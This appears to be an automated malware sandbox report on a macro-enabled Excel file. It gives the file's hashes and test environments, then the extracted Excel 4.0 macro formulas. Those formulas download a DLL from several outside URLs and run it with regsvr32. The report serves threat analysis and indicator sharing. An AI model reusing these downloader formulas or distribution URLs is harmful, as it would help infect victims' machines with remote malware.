Behavioral task
behavioral1
Sample
VJX-88747877189.xlsm
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
VJX-88747877189.xlsm
Resource
win10v2004-20230621-en
General
-
Target
VJX-88747877189.xlsm
-
Size
46KB
-
MD5
94effc0e0771b71bad4593c9430fe67b
-
SHA1
4aa62a4efbb8c02b145fe5db3c0873ac0fe275c4
-
SHA256
989afb22d889ef10aefc7185c5a8d051fa3dd6c0f2a6a811c1a89498e293b615
-
SHA512
30c83fa06219cc8c0365d1f8487a3591e0cf2ac90e92019b8ccdb018f0711349b273c12dc5fa69ecc23c9c06d8e367ca72e5c6747987ff43b2b5229b76e86892
-
SSDEEP
768:cmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:dBlntTEvDLmXi3JvG6YzATOJnXYSXRM
Malware Config
Extracted
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0)
=IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0))
=IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0))
=IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0))
=IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0))
=IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0))
=IF('PIMKE'!C24<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll")
=RETURN()
Signatures
Files
-
VJX-88747877189.xlsm.xlsm office2007